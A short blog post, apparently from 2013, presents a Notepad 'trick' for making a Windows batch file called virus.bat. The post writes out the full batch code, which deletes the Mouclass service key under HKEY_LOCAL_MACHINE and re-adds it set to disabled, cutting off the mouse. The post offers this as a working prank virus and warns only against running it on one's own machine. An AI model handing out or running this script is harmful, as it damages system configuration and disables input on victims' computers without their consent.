Thursday, October 17, 2013

VIRUS THAT DISABLES MOUSE.


This is trick which deals with Notepad and its one of the dangerous virus that effects the mouse.
Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.
Note: don’t try in your personal computer and laptops

No comments:

Post a Comment